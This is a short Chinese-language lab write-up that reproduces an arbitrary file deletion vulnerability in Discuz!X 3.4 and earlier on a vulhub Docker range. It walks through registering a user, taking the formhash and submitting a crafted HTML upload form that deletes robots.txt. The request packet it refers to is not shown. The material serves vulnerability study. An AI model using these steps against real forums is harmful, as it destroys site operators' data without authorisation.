一、环境搭建
本次用的是vulhub靶场
执行下列命令部署 Discuz!X 安装环境
docker-compose up -d
安装时,只用修改数据库地址为`db`,其他保持默认即可:
二、漏洞复现
(1)访问`http://your-ip/robots.txt`可见robots.txt是存在的:
(2)注册用户hahaha
(3)在个人设置页面找到自己的formhash
(4)带上自己的Cookie、formhash发送如下数据包
(5)查看个人设置页面的出生地
(6)构造upload.html,写上自己的formhash
<body>
<form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[formhasg]" method="post" enctype="multipart/form-data">
<input type="file" name="birthprovince" />
<input type="submit" value="upload" />
</form>
</body>
(7)用浏览器打开该页面,上传一个正常图片。此时脏数据应该已被提取出,漏洞已经利用结束。
再次访问http://your-ip/robots.txt
,发现文件成功被删除:
三、其他
影响版本:Discuz!X ≤3.4